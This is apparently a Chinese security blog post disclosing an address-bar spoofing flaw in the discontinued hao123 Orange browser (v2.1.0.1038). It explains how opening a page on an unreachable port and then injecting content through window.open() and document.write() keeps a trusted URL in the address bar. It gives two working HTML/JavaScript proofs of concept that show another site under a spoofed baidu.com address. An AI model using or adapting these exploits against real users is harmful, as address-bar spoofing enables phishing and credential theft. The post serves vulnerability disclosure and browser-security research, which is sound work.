0x00:原理
伪造URL地址漏洞,HTTP204/205地址栏伪造。
页面欺骗漏洞函数:
Window.open()
document.write()
通过一个欺骗漏洞,浏览器跳转到一个新的页面,加载了一个无效地址,处于挂起状态,并且未对无效地址做任何处理。
0x01:漏洞
浏览器版本:v2.1.0.1038 (已停止更新了)
1.HTTP204伪造网站漏洞
204 No Content(无内容)—-该响应码有时候表明请求已经执行成功但不需要做任何响应。204响应码会中断浏览器的页面跳转,浏览器会保持原URL不变,页面内容也维持原状。
window.open() 跳转到HTTP 204之后,会更新地址栏,然后通过opener注入
伪造百度,因为成功跳转,需要伪造一个指定无法访问的端口即可。
exp:
<a href="https://www.baidu.com:5555" target="sb" onclick="setTimeout('d()', 1000);">点我</a>
<script>
function d(){
window.open("javascript:location.href='<title>百度搜索</title>www.yuag.org'", "sb");
}
</script>
2.伪造任意网站漏洞
poc:
<html>
<head>
<title>打开小雨博客</title>
<script type="text/javascript">
var wx;
function poc() {
wx = open("http://www.baidu.com:5555","newwin");
doit();
}
function doit() {
wx.document.write("<ti"+"tle>yuag</title><iframe src='https://www.yuag.org' width=95% height=95%>");
}
poc();
</script>
0x03:视频
https://www.bilibili.com/video/av55777222
0x04:参考
现代浏览器新安全研究.ppt
WEB之困
浏览器地址栏欺骗漏洞挖掘.VSRC.2017.7.29城市沙龙第一站.ppt
现代浏览器地址栏之困.ppt
白帽子讲浏览器安全
Browser UI Security 技术白皮书
本文固定链接:小雨' s Blog » [浏览器安全漏洞二] hao123桔子浏览器 – 页面欺骗漏洞
本站内容除特别标注外均为原创,欢迎转载,但请保留出处!